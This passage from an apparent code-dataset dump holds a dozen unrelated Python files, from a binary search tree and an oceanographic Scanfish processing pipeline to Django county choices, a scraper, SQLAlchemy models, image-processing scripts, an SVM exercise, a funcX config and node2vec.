val_str[:-2] + ')'\n return val_str\n return f'{self.__class__.__name__}: ' + subtree_str(self)\n\n\nclass BinarySearchTree:\n def __init__(self, dtype):\n self._dtype = dtype\n self._root = None\n \n def insert(self, val):\n if self._root is None: \n self._root = BinaryTree(val)\n return self\n assert isinstance(val, self._root._dtype), 'Invalid data type'\n p = self._root\n while True:\n if val <= p.value and p[0] is None:\n p[0] = BinaryTree(val)\n break\n if val > p.value and p[1] is None:\n p[1] = BinaryTree(val)\n break \n p = p[0] if val <= p.value else p[1]\n return self\n \n def search(self, val):\n if self._root.value == val:\n return ['root']\n ndidx = []\n p = self._root\n while p is not None:\n if p.value == val:\n return ndidx\n if val < p.value:\n ndidx.append(0)\n p = p[0]\n else:\n ndidx.append(1)\n p = p[1] \n return -1\n \n def access(self, idxlst:list):\n if idxlst == ['root']:\n return self._root\n return self._root.access(idxlst)\n \n def remove(self, val):\n idx = self.search(val)\n if idx == -1:\n return -1\n nd = self.access(idx)\n \n if nd != self._root:\n par_nd = nd._parents[0]\n else:\n # create a dummy Node and then remove it at the end of the function\n par_nd = BinaryTree(val)\n par_nd[0] = nd\n ndidx = 0 if par_nd[0] == nd else 1\n \n if nd.child_count() == 0:\n par_nd.remove_child(ndidx)\n if nd == self._root: \n self._root = None\n return self\n \n subidx = 1 if nd[1] is not None else 0\n lookupidx = 0 if nd[1] is not None else 1\n par_nd.replace_child(ndidx, nd[subidx]) \n if nd[lookupidx] is not None:\n sub = nd[subidx]\n while sub[lookupidx] is not None:\n sub = sub[lookupidx]\n sub[lookupidx] = nd[lookupidx]\n if nd == self._root:\n self._root = nd[subidx]\n return self\n \n def __repr__(self):\n return repr(self._root)\n \n def __str__(self):\n return str(self._root)\n\n\nif __name__ == '__main__': \n BST = BinarySearchTree\n BT = BinaryTree\n root = BT('ROOT')\n root[0] = BT('l')\n root[1] = BT('r')\n root[0][0] = BT('ll')\n root[0][1] = BT('lr')\n root[1][1] = BT('rr')\n root[1][1][1] = BT('rrr')\n\n print(root)\n print(repr(root))\n print('*'*60)\n\n print(root[1][1])\n print(repr(root[1][1][1]))\n print('*'*60)\n\n print(root[1][1][1] == root.access([1,1,1]))\n print('*'*60)\n\n bst = BST(int)\n 
print(bst.insert(100).insert(10).insert(20).insert(15).insert(17).insert(16).insert(1).insert(5))\n print(bst.search(11))\n print(bst.search(100))\n print(bst.search(10))\n print(bst.search(15))\n print(bst.access(bst.search(15)))\n print('*' * 60)\n\n print(bst)\n print(bst.remove(10))","sub_path":"datastructure/tree.py","file_name":"tree.py","file_ext":"py","file_size_in_byte":5235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"349802646","text":"# JeromeJGuay January 2020\n\n# Main file to execute Scanfish script.\n\nimport numpy as np\nimport xarray as xr\n\nimport os\nimport sys\nsys.path.append(\"../\")\n\nimport Sillex2018_MetaData as Sx\n\nfrom Processing.Convert.Open_CTD_CNV import cnv_to_netcdf\n\nfrom Processing.Handling.Scanfish_Processing import (remove_Tide,\n ajusted_position,\n filter_cast,\n add_cable_length)\n \nfrom Processing.Gridding.Scanfish_Gridding import transects_gridding\n\nfrom Processing.FindTransect.FindTransect import add_transect_and_position\n\nraw_path = '/home/jeromejguay/WorkSpace/Data/Sillex2018/Raw/Scanfish/SBE49/Data/'\nraw_files = [raw_path+'SBE49_Scanfish_004.cnv',\n raw_path+'SBE49_Scanfish_005.cnv',\n raw_path+'SBE49_Scanfish_006.cnv',\n raw_path+'SBE49_Scanfish_007.cnv',\n raw_path+'SBE49_Scanfish_008.cnv']\n\nSill = \"SillB\"\nleg = Sx.legs['Transect' + Sill]\ntransect = Sx.transects[Sill]\n\nattrs = {\"SillB\": {\"Mission\": \"Sillex2018\"},\n \"SillC\": {\"Mission\": \"Sillex2018\"}}\n\n# \"\"\"---Raw File---\"\"\"\nraw_ds = cnv_to_netcdf(raw_files)\nraw_ds = raw_ds.sel(time=slice(leg[0], leg[1]))\nraw_ds = raw_ds.assign_attrs(attrs[Sill])\n\n\n# \"\"\"---Add calbe Lenght---\"\"\"\ncablelength = 500 # meters\nraw_ds = add_cable_length(raw_ds, cablelength)\n\nraw_save_path = \"/home/jeromejguay/WorkSpace/Data/Sillex2018/Processed/Scanfish/\" + Sill + \"_raw.nc\"\nos.system(\"rm \"+raw_save_path)\nraw_ds.to_netcdf(raw_save_path)\n\n\n# \"\"\"---Remove Tide---\"\"\"\nTideHeight = xr.open_dataset(\"/home/jeromejguay/WorkSpace/Data/Sillex2018/Raw/Tide/Tide.nc\")\ncorrected_ds = remove_Tide(raw_ds, TideHeight)\n\ncorrected_save_path = \"/home/jeromejguay/WorkSpace/Data/Sillex2018/Processed/Scanfish/\" + Sill + \"_corrected.nc\"\nos.system(\"rm \"+corrected_save_path)\ncorrected_ds.to_netcdf(corrected_save_path)\n\n\n# \"\"\"---Get Transect---\"\"\"\nP0 = [transect[0], transect[3]] # [lon0, lat0]\nP1 = [transect[1], transect[2]] # [lon1, lat1]\ntransect_ds = add_transect_and_position(corrected_ds, P0, P1)\ntransect_ds = ajusted_position(transect_ds)\n\n\n# \"\"\"---Get Cast---\"\"\"\ncast = 'up'\ncast_ds = filter_cast(transect_ds, cast=cast, ordered_density=True)\n\ncast_save_path = \"/home/jeromejguay/WorkSpace/Data/Sillex2018/Processed/Scanfish/\" + Sill + \"_\" + 'cast.nc'\nos.system(\"rm \"+cast_save_path)\ncast_ds.to_netcdf(cast_save_path)\n\n\n# \"\"\"---Grid_Cast---\"\"\"\np_res = 50\nd_res = 0.2\n\ngridded_ds = transects_gridding(cast_ds, p_res, d_res,\n min_depth=0, max_depth=180,\n savefile=None)\n\ngridded_save_path = \"/home/jeromejguay/WorkSpace/Data/Sillex2018/Processed/Scanfish/\" + Sill + \"_\" + 'gridded.nc'\ngridded_ds.to_netcdf(gridded_save_path)\n","sub_path":"Executable/Scanfish.py","file_name":"Scanfish.py","file_ext":"py","file_size_in_byte":2825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"561794460","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.utils.translation import 
ugettext_lazy as _\n\n#: An alphabetical list of Swedish counties, sorted by codes.\n#: http://en.wikipedia.org/wiki/Counties_of_Sweden\nCOUNTY_CHOICES = (\n ('AB', _('Stockholm')),\n ('AC', _('Västerbotten')),\n ('BD', _('Norrbotten')),\n ('C', _('Uppsala')),\n ('D', _('Södermanland')),\n ('E', _('Östergötland')),\n ('F', _('Jönköping')),\n ('G', _('Kronoberg')),\n ('H', _('Kalmar')),\n ('I', _('Gotland')),\n ('K', _('Blekinge')),\n ('M', _('Skåne')),\n ('N', _('Halland')),\n ('O', _('Västra Götaland')),\n ('S', _('Värmland')),\n ('T', _('Örebro')),\n ('U', _('Västmanland')),\n ('W', _('Dalarna')),\n ('X', _('Gävleborg')),\n ('Y', _('Västernorrland')),\n ('Z', _('Jämtland')),\n)\n\n#: A dictionary of numerical county codes, with alphabetical codes\n#: as keys and the more modern numerical codes as values.\n#:\n#: Values taken from https://sv.wikipedia.org/wiki/Sveriges_län,\n#: and code system described at https://sv.wikipedia.org/wiki/Länskod\n#: and http://www.scb.se/sv_/Hitta-statistik/Regional-statistik-och-kartor/Regionala-indelningar/Lan-och-kommuner/Lan-och-kommuner-i-kodnummerordning/\n\nNUMERICAL_COUNTY_CODE_CHOICES = (\n ('AB', '01',),\n ('AC', '24',),\n ('BD', '25',),\n ('C', '03',),\n ('D', '04',),\n ('E', '05',),\n ('F', '06',),\n ('G', '07',),\n ('H', '08',),\n ('I', '09',),\n ('K', '10',),\n ('M', '12',),\n ('N', '13',),\n ('O', '14',),\n ('S', '17',),\n ('T', '18',),\n ('U', '19',),\n ('W', '20',),\n ('X', '21',),\n ('Y', '22',),\n ('Z', '23',),\n)\n\n#: A dictionary of full county names, as these are formed\n#: somewhat differently in Swedish, e.g. \"Skåne län\" as opposed to\n#: the more generic \"Stockholms län\" (ending with genitive case s)\n\nFULL_COUNTY_NAME_CHOICES = (\n ('AB', _('Stockholm County'),),\n ('AC', _('Västerbotten County'),),\n ('BD', _('Norrbotten County'),),\n ('C', _('Uppsala County'),),\n ('D', _('Södermanland County'),),\n ('E', _('Östergötland County'),),\n ('F', _('Jönköping County'),),\n ('G', _('Kronoberg County'),),\n ('H', _('Kalmar County'),),\n ('I', _('Gotland County'),),\n ('K', _('Blekinge County'),),\n ('M', _('Skåne County'),),\n ('N', _('Halland County'),),\n ('O', _('Västra Götaland County'),),\n ('S', _('Värmland County'),),\n ('T', _('Örebro County'),),\n ('U', _('Västmanland County'),),\n ('W', _('Dalarna County'),),\n ('X', _('Gävleborg County'),),\n ('Y', _('Västernorrland County'),),\n ('Z', _('Jämtland County'),),\n)\n","sub_path":"localflavor/se/se_counties.py","file_name":"se_counties.py","file_ext":"py","file_size_in_byte":2649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"412786276","text":"import string\n\nimport requests\nfrom lxml import etree\nimport json\n\n\ndef get_one_page(url):\n kv = {'User-Agent': 'Mozilla/5.0'} # the header key must be 'User-Agent' for servers to recognize it\n response = requests.get(url, headers=kv)\n if response.status_code == 200:\n return response.text\n return None\n\n\ndef main():\n for a in string.ascii_uppercase:\n url = 'https://www.nhs.uk/service-search/GP/Location/Places/' + a + '/4'\n html = get_one_page(url)\n html1 = etree.HTML(html)\n result = html1.xpath('//*[@id=\"main-content\"]/div/div[2]/div[1]/ul/li/a/@href')\n result1 = html1.xpath('//*[@id=\"main-content\"]/div/div[2]/div[1]/ul/li/a')\n fr = open('url.json')\n model = json.load(fr)\n fr.close()\n for i in range(len(result1)):\n model[result1[i].text] = result[i]\n\n jsObj = json.dumps(model, indent=2)\n\n with open('url.json', 'w') as file:\n file.write(jsObj)\n 
file.close()\n\n\nmain()\nprint(\"yes\")\n","sub_path":"code/webcrawler.py","file_name":"webcrawler.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"636031920","text":"import datetime\nfrom db.mysql import BaseModel, engine\nfrom sqlalchemy import Column, Integer, String, DateTime\n\n\nclass HotWords(BaseModel):\n \"\"\"\n Hot words table\n \"\"\"\n\n __tablename__ = 'hot_words'\n\n id = Column(Integer, primary_key=True, autoincrement=True)\n word = Column(String(100), nullable=False)\n num = Column(Integer, default=0)\n update_dt = Column(DateTime, default=datetime.datetime.now) # pass the callable so the timestamp is evaluated per insert, not once at import\n\n def __init__(self, word):\n self.word = word\n\n def to_json(self, keys=[]):\n json_data = {}\n\n if len(keys) != 0:\n for key in keys:\n json_data[key] = getattr(self, key)\n return json_data\n else:\n return {\n 'word': self.word,\n 'num': self.num,\n 'updated_dt': str(self.update_dt)\n }\n\n\n\nclass NewsWords(BaseModel):\n \"\"\"\n Word segmentation storage table\n \"\"\"\n\n __tablename__ = 'news_words'\n\n id = Column(Integer, primary_key=True, autoincrement=True)\n name = Column(String(100), nullable=False)\n update_dt = Column(DateTime, default=datetime.datetime.now)\n\n def __init__(self, name):\n self.name = name\n\n def to_json(self, keys=[]):\n json_data = {}\n\n if len(keys) != 0:\n for key in keys:\n json_data[key] = getattr(self, key)\n return json_data\n else:\n return {\n 'name': self.name,\n 'updated_dt': str(self.update_dt)\n }\n\n\nclass ReqUrlNameMapping(BaseModel):\n __tablename__ = 'req_url_name_mapping'\n\n id = Column(Integer, primary_key=True, autoincrement=True)\n name = Column(String(50), nullable=True, index=True)\n url = Column(String(200), nullable=True)\n pdt_type = Column(String(5))\n color = Column(String(20), default='#108ee9')\n updated_dt = Column(DateTime, default=datetime.datetime.now)\n created_dt = Column(DateTime, default=datetime.datetime.now)\n\n def __init__(self, name, url, pdt_type, color):\n self.name = name\n self.url = url\n self.pdt_type = pdt_type\n self.color = color\n\n def to_json(self, keys=[]):\n json_data = {}\n\n if len(keys) != 0:\n for key in keys:\n json_data[key] = getattr(self, key)\n return json_data\n else:\n return {\n 'name': self.name,\n 'url': self.url,\n 'pdt_type': self.pdt_type,\n 'color': self.color,\n 'updated_dt': str(self.updated_dt),\n 'created_dt': str(self.created_dt)\n }\n\n\nclass ParseLog(BaseModel):\n __tablename__ = 'parse_log'\n\n id = Column(Integer, primary_key=True, autoincrement=True)\n name = Column(String(50), nullable=True, index=True)\n author = Column(String(20), default='', index=True)\n pdt_type = Column(String(5))\n info_num = Column(Integer, default=0, index=True)\n req_url = Column(String(200), nullable=True, index=True)\n url = Column(String(500), default='')\n orig_createtime = Column(String(40), default='', nullable=True)\n updated_dt = Column(DateTime, default=datetime.datetime.now)\n created_dt = Column(DateTime, default=datetime.datetime.now)\n\n def __init__(self, name, req_url, author='', pdt_type='', info_num=0, url='', orig_createtime='', updated_dt=None, created_dt=None):\n self.name = name\n self.author = author\n self.pdt_type = pdt_type\n self.info_num = info_num\n self.req_url = req_url\n self.url = url\n self.orig_createtime = orig_createtime\n self.updated_dt = updated_dt\n self.created_dt = created_dt\n\n def to_json(self, keys=[]):\n json_data = {}\n\n if len(keys) != 0:\n for key in keys:\n json_data[key] = 
getattr(self, key)\n return json_data\n else:\n return {\n 'id': self.id,\n 'name': self.name,\n 'author': self.author,\n 'pdt_type': self.pdt_type,\n 'info_num': self.info_num,\n 'req_url': self.req_url,\n 'url': self.url,\n 'orig_createtime': self.orig_createtime,\n 'updated_dt': self.updated_dt,\n 'created_dt': self.created_dt\n }\n\n\n# class ParseRank(BaseModel):\n#\n# __tablename__ = 'parse_rank'\n#\n# id = Column(Integer, comment='自增id',primary_key=True, autoincrement=True)\n# name = Column(String(20), comment='名称',nullable=True)\n# author = Column(String(20), comment='作者', default='')\n\n\n\nBaseModel.metadata.create_all(engine)","sub_path":"models/products.py","file_name":"products.py","file_ext":"py","file_size_in_byte":4667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"195845761","text":"import igraph, copy\n\n# Determines whether the given igraph.Graph has a Gray Code\ndef GrayCode(graph):\n num_vertices = graph.vcount()#len(graph.neighbors())\n full_code = []\n first_code = [0 for i in range(0, num_vertices)]\n stack = []\n\n current_vertex = 0\n previous_code = None\n skip = 0\n\n num_required = 2**graph.vcount()\n num_generated = 0\n prev_cp = []\n while num_generated != num_required:\n new_code = []\n found = False\n # Each vertex neighboring the current, not including\n # vertexes we've already checked and that fail\n neighbors = graph.neighbors(current_vertex)\n neighbors.sort()\n for neighbor in neighbors[skip:]:#graph.neighbors(current_vertex).sort()[skip:]:\n\n #print (\"neighbor: \")\n # Not first code\n\n if previous_code != None:\n full_code = fc_cp\n #previous_code = prev_cp\n #print \"stack0\", stack\n new_code = GenerateGrayCode(previous_code, neighbor)\n previous_code = new_code\n # Unique?\n if new_code not in full_code:\n fc_cp = copy.deepcopy(full_code)\n fc_cp.append(new_code)\n num_generated += 1\n stack.append(fc_cp)\n #print \"stack 1\", stack\n current_vertex = neighbor\n found = True\n skip = 0\n break\n\n # First code\n else:\n fc_cp = copy.deepcopy(full_code)\n fc_cp.append(first_code)\n previous_code = first_code\n stack.append(fc_cp)\n found = True\n num_generated += 1\n break\n\n # No gray code exists\n if len(stack) == 0:\n return False\n\n # Backtrack\n if not found:\n num_generated -= 1\n full_code = stack.pop()\n skip = skip + 1\n\n # End of while loop, num_generated == num_required\n return True\n\n\ndef GenerateGrayCode(previous_code, neighbor):\n #print 'gen gray code'\n #print previous_code\n #print neighbor\n prev_cp = copy.deepcopy(previous_code)\n if prev_cp[neighbor] == 0:\n prev_cp[neighbor] = 1\n else:\n prev_cp[neighbor] = 0\n return prev_cp\n","sub_path":"gray_code.py","file_name":"gray_code.py","file_ext":"py","file_size_in_byte":2381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"416428362","text":"import numpy as np\nimport cv2 as cv\n\ndef stereo_match(imgL, imgR):\n # disparity range is tuned for 'aloe' image pair\n window_size = 3\n min_disp = 16\n num_disp = 112-min_disp\n stereo = cv.StereoSGBM_create(minDisparity = min_disp,\n numDisparities = num_disp,\n blockSize = 16,\n P1 = 8*3*window_size**2,\n P2 = 32*3*window_size**2,\n disp12MaxDiff = 1,\n uniquenessRatio = 10,\n speckleWindowSize = 100,\n speckleRange = 32\n )\n\n print('computing disparity...')\n disp = stereo.compute(imgL, imgR).astype(np.float32) / 16.0\n\n cv.imshow('left', imgL)\n cv.imshow('disparity', (disp-min_disp)/num_disp)\n 
cv.waitKey(0)\n\n\nif __name__ == '__main__':\n base_path = 'opencv/data/'\n imgL = cv.imread(base_path + 'aloeL.jpg')\n imgR = cv.imread(base_path + 'aloeR.jpg')\n stereo_match(imgL, imgR)\n cv.destroyAllWindows()","sub_path":"opencv/study/6CameraCalibrationAnd3DReconstruction/4StereoImages.py","file_name":"4StereoImages.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"257288873","text":"import numpy as np\nimport datetime\nimport matplotlib.pyplot as plt\n\n\ndef prob_2_gs(h, R, Z, precision_voulue):\n temps_debut = datetime.datetime.now()\n\n # Constants\n M = R*h # number of grid cells in r\n N = Z*h # number of grid cells in z\n precision_voulue = precision_voulue\n\n # Create the potential arrays\n V = np.zeros((M+1, N+1), float)\n Vprime = np.empty([M+1, N+1], float)\n\n # Define the boundary conditions\n V[0:1*h, :] = 150 # 1 cm times h for the central cylinder\n V[-1, :] = 0 # end of the cylinder at r=10 cm\n V[1*h:, 0], V[1*h:, -1] = 0, 0 # ends at z=0 and z=30 cm\n\n # Main loop\n delta = 1.0\n compteur = 0\n Vprime[:] = V\n print(\"h: \", h, \"M: \", M)\n while delta > precision_voulue:\n compteur += 1\n\n # Compute the new potential values\n for i in range(M+1):\n for j in range(N+1):\n\n if i < 1*h or i == M or j == 0 or j == N: # if on a boundary condition\n Vprime[i, j] = Vprime[i, j]\n\n else:\n Vprime[i, j] = 1/4*(h/(2*i*h)*(Vprime[i+1, j]-Vprime[i-1, j])\n + Vprime[i+1, j] + Vprime[i-1, j] + Vprime[i, j+1] + Vprime[i, j-1])\n\n # Compute the max difference between the new and old values\n delta = np.max(abs(V-Vprime))\n #print(\"compteur: \", compteur, \"delta: \", delta)\n\n # Swap the two arrays and start over\n V[:] = Vprime[:]\n\n # Make a plot\n temps_fin = datetime.datetime.now()\n delta_temps = temps_fin - temps_debut\n print(\"Temps d'éxécution: \", \"{}.{} s\".format(delta_temps.seconds, delta_temps.microseconds))\n print(\"nombre d'itération: \", compteur, \" itérations\")\n plt.figure(figsize=(9, 6))\n plt.imshow(Vprime, cmap=\"viridis\")\n plt.title(\"Potentiel du problème 2 avec h={} et une précision de {} V\".format(h, precision_voulue))\n plt.axis()\n plt.colorbar()\n plt.show()\n\n\nprob_2_gs(10, 10, 30, 1e-3)\n","sub_path":"No2/No2_ci.py","file_name":"No2_ci.py","file_ext":"py","file_size_in_byte":2011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"281659771","text":"# -*- coding: utf-8 -*-\nimport cv2\nimport numpy as np\nimport os\n\ndef LBP(image):\n W, H = image.shape # get the image width and height\n xx = [-1, 0, 1, 1, 1, 0, -1, -1]\n yy = [-1, -1, -1, 0, 1, 1, 1, 0] # xx, yy are the offsets relative to the center point when traversing the neighbors clockwise\n res = np.zeros((W - 2, H - 2),dtype=\"uint8\") # create a zero array; its dimensions are the original width and height minus 2, and the dtype must be uint8 (unsigned 8-bit), OpenCV's image storage format\n for i in range(1, W - 2):\n for j in range(1, H - 2):\n temp = \"\"\n for m in range(8):\n Xtemp = xx[m] + i\n Ytemp = yy[m] + j # get the corresponding neighbor coordinates\n if image[Xtemp, Ytemp] > image[i, j]: # compare pixels\n temp = temp + '1'\n else:\n temp = temp + '0'\n #print int(temp, 2)\n res[i - 1][j - 1] = int(temp, 2) # write into the result\n return res\n\ni=0\npath=r'E:\\dataset\\nonjiaoyu\\aug_yuanshi\\ck+\\train'\nout_path=r'E:\\dataset\\nonjiaoyu\\augAGE\\LBP\\ck+\\train'\ndir_list=os.listdir(path)\nfor list in dir_list:\n if list == 'angry':\n f = os.path.join(path,list)\n o = os.path.join(out_path,list)\n elif list == 'contempt':\n f = os.path.join(path, list)\n o = os.path.join(out_path, list)\n elif list == 
'disgust':\n f = os.path.join(path, list)\n o = os.path.join(out_path, list)\n elif list == 'fear':\n f = os.path.join(path, list)\n o = os.path.join(out_path, list)\n elif list == 'happy':\n f = os.path.join(path, list)\n o = os.path.join(out_path, list)\n elif list == 'neutral':\n f = os.path.join(path, list)\n o = os.path.join(out_path, list)\n elif list == 'sad':\n f = os.path.join(path, list)\n o = os.path.join(out_path, list)\n elif list == 'surprise':\n f = os.path.join(path, list)\n o = os.path.join(out_path, list)\n else:\n print(\"get error.......\\n\")\n break\n fs = os.listdir(f)\n for f1 in fs:\n tmp_path = os.path.join(f, f1)\n if not os.path.isdir(tmp_path):\n frame = cv2.imread(tmp_path,0)\n #gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n #frame = cv2.resize(gray, (227, 227))\n dst=LBP(frame)\n #dst = cv2.resize(dst, (227, 227))\n writ_path=os.path.join(o,f1)\n cv2.imwrite(writ_path,dst)\n i=i+1\n print(i)","sub_path":"LBP转化.py","file_name":"LBP转化.py","file_ext":"py","file_size_in_byte":2484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"212833349","text":"#coding=utf-8\n\nimport datetime\nfrom config import consts\nfrom utils import html_util\nfrom config.log_setting import logger \n\nclass NewsItem(object):\n\n def __init__(self,\n title='',\n url='',\n description=None, # empty strings \"\" cannot be queried in ES, so write None directly when empty\n pubdate='',\n symbol='',\n fromsite='未知',\n insertdate=datetime.datetime.now().strftime(consts.DATE_FORMAT),\n origin_fromsite='',\n content=None,\n author=None,\n keywords=None,\n favorite_num=-1, # -1 means the field is absent\n comment_num=-1,\n agree_num=-1,\n disagree_num=-1,\n ):\n self.title = title\n self.url = url\n\n # summary; if missing, take the first 100 characters of the content field\n logger.info(\"content:%s, description:%s\" % (content, description))\n if (description is None or description == '') and (content is not None and len(content) > 0):\n logger.info('change content to description')\n self.description = (html_util.strip_tags(content))[:100]\n else:\n self.description = self.norm(description)\n\n self.pubdate = pubdate # news publish time, format: yyyy-mm-dd HH:MM:SS, see config.consts.DATE_FORMAT\n self.symbol = symbol\n self.fromsite = fromsite # site that was crawled\n self.insertdate = insertdate # crawl time\n self.origin_fromsite = self.norm(origin_fromsite) # site the news actually belongs to\n self.content = self.norm(content) # body text\n self.author = self.norm(author) # author\n self.keywords = self.norm(keywords) # news keywords\n self.favorite_num=favorite_num\n self.comment_num=comment_num\n self.agree_num=agree_num\n self.disagree_num=disagree_num\n\n def norm(self,field):\n if field == \"\":\n return None\n return field\n\n def _asdict(self):\n '''\n 1. for python object json serialize\n 2. 
gen out a python dict obj\n '''\n return self.__dict__\n\ndef default(o):\n '''\n for python object json serialize\n example: json.dumps(crawl_tonghuashun('baba'), default=default)\n '''\n\n return o._asdict()\n","sub_path":"news_crawler/news.py","file_name":"news.py","file_ext":"py","file_size_in_byte":2277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"131697818","text":"#!/usr/bin/python3\n\n\"\"\" \n this is the code to accompany the Lesson 2 (SVM) mini-project\n\n use an SVM to identify emails from the Enron corpus by their authors\n \n Sara has label 0\n Chris has label 1\n\n\"\"\"\n \nimport sys\nfrom time import time\nsys.path.append(\"../tools/\")\nfrom email_preprocess import preprocess\nfrom sklearn.svm import SVC\nfrom collections import Counter\n\n\n### features_train and features_test are the features for the training\n### and testing datasets, respectively\n### labels_train and labels_test are the corresponding item labels\nfeatures_train, features_test, labels_train, labels_test = preprocess()\n\n#########################################################\n### your code goes here ###\n\n#portion used to make the dataset smaller\n#features_train = features_train[:len(features_train)//100]\n#labels_train = labels_train[:len(labels_train)//100]\n\nclf = SVC(kernel=\"rbf\", C=10000.0, gamma=\"auto\")\ntime0 = time()\nclf.fit(features_train, labels_train)\nprint (\"Training time: \" + str(round(time()-time0, 2)) + \"s\")\n\nprint(\"accuracy:\")\naccuracy = clf.score(features_test, labels_test)\nprint(accuracy)\n\npred = clf.predict(features_test)\nprint(\"element 10, 26, 50: \\n\")\nelements = [str(pred[10]), str(pred[26]), str(pred[50])]\nprint(\"\\n\".join(elements))\n\n#Find the amount classified as chris:\nprint(Counter(pred)[1])\nprint(Counter(pred)[0])\n\n\n\n\n#########################################################\n\n\n","sub_path":"svm/svm_author_id.py","file_name":"svm_author_id.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"121102925","text":"from parsl.addresses import address_by_hostname\nfrom parsl.launchers import AprunLauncher\nfrom parsl.providers import TorqueProvider\n\nfrom funcx_endpoint.endpoint.utils.config import Config\nfrom funcx_endpoint.executors import HighThroughputExecutor\n\n# fmt: off\n\n# PLEASE UPDATE user_opts BEFORE USE\nuser_opts = {\n 'bluewaters': {\n 'worker_init': 'module load bwpy;source anaconda3/etc/profile.d/conda.sh;conda activate funcx_testing_py3.7',\n 'scheduler_options': '',\n }\n}\n\nconfig = Config(\n executors=[\n HighThroughputExecutor(\n max_workers_per_node=1,\n worker_debug=False,\n address=address_by_hostname(),\n provider=TorqueProvider(\n queue='normal',\n launcher=AprunLauncher(overrides=\"-b -- bwpy-environ --\"),\n\n # string to prepend to #SBATCH blocks in the submit\n scheduler_options=user_opts['bluewaters']['scheduler_options'],\n\n # Command to be run before starting a worker, such as:\n # 'module load bwpy; source activate funcx env'.\n worker_init=user_opts['bluewaters']['worker_init'],\n\n # Scale between 0-1 blocks with 2 nodes per block\n nodes_per_block=2,\n init_blocks=0,\n min_blocks=0,\n max_blocks=1,\n\n # Hold blocks for 30 minutes\n walltime='00:30:00'\n ),\n )\n\n ],\n)\n\n# fmt: 
on\n","sub_path":"docs/configs/bluewaters.py","file_name":"bluewaters.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"514031984","text":"\"\"\"\nImplementation of heterogeneous node2vec algorithm.\nBased on the reference implementation of node2vec by Aditya Grover\nand adapted from code at https://github.com/aditya-grover/node2vec\n\"\"\"\n\nimport argparse\nimport networkx as nx\nfrom gensim.models import Word2Vec\nimport n2v\nimport os\nimport logging\nlog = logging.getLogger(\"n2v.log\")\n\nhandler = logging.handlers.WatchedFileHandler(\n os.environ.get(\"LOGFILE\", \"n2v.log\"))\nformatter = logging.Formatter('%(asctime)s - %(levelname)s -%(filename)s:%(lineno)d - %(message)s')\nhandler.setFormatter(formatter)\nlog = logging.getLogger()\nlog.setLevel(logging.INFO)\nlog.addHandler(handler)\nlog.addHandler(logging.StreamHandler())\n\n\ndef parse_args():\n\t\"\"\"\n\tparse args of node2vec\n\t\"\"\"\n\tparser = argparse.ArgumentParser(description=\"Run node2vec.\")\n\n\tparser.add_argument('--input', nargs='?', default='graph/karate.train', help='Input graph path')\n\n\tparser.add_argument('--output', nargs='?', default='emb/karate.emb', help='Embeddings path')\n\n\tparser.add_argument('--dimensions', type=int, default=128, help = 'Number of dimensions. Default is 128.')\n\n\tparser.add_argument('--walk-length', type=int, default=80, help='Length of walk per source. Default is 80.')\n\n\tparser.add_argument('--num-walks', type=int, default=10, help='Number of walks per source. Default is 10.')\n\n\tparser.add_argument('--window-size', type=int, default=10, help='Context size for optimization. Default is 10.')\n\n\tparser.add_argument('--iter', default=1, type=int, help='Number of epochs in SGD')\n\n\tparser.add_argument('--workers', type=int, default=8, help='Number of parallel workers. Default is 8.')\n\n\tparser.add_argument('--p', type=float, default=1, help='Return hyperparameter. Default is 1.')\n\n\tparser.add_argument('--q', type=float, default=1, help='Inout hyperparameter. Default is 1.')\n\n\tparser.add_argument('--gamma', type=float, default=1, help='Inout hyperparameter. Default is 1.')\n\n\tparser.add_argument('--weighted', dest='weighted', action='store_true',\n\t\t\t\t\t\thelp='Boolean specifying (un)weighted. Default is unweighted.')\n\tparser.add_argument('--unweighted', dest='unweighted', action='store_false')\n\tparser.set_defaults(weighted=False)\n\n\tparser.add_argument('--directed', dest='directed', action='store_true',\n\t\t\t\t\t\thelp='Graph is (un)directed. 
Default is undirected.')\n\tparser.add_argument('--undirected', dest='undirected', action='store_false')\n\tparser.set_defaults(directed=False)\n\n\treturn parser.parse_args()\n\ndef output_args_to_logger(args):\n\tlog.info(\"Input: {}\".format(args.input))\n\tlog.info(\"output: {}\".format(args.output))\n\tlog.info(\"weighted: {}\".format(args.weighted))\n\n\ndef read_graph():\n\t\"\"\"\n\tReads the input network in networkx.\n\t\"\"\"\n\tif args.weighted:\n\t\tg = nx.read_edgelist(args.input, nodetype=str, data=(('weight', float),), create_using=nx.DiGraph())\n\telse:\n\t\tg = nx.read_edgelist(args.input, nodetype=str, create_using=nx.DiGraph())\n\t\tfor edge in g.edges():\n\t\t\tg[edge[0]][edge[1]]['weight'] = 1\n\n\tif not args.directed:\n\t\tg = g.to_undirected()\n\n\treturn g\n\n\ndef learn_embeddings(walks):\n\t\"\"\"\n\tLearn embeddings by optimizing the Skipgram objective using SGD.\n\t\"\"\"\n\twalks = [map(str, walk) for walk in walks]\n\tmodel = Word2Vec(walks, size=args.dimensions, window=args.window_size, min_count=0, sg=1, workers=args.workers,\n\t\t\t\t\titer=args.iter)\n\n\t#model.wv.save_word2vec_format(args.output)# TODO:python 3 and 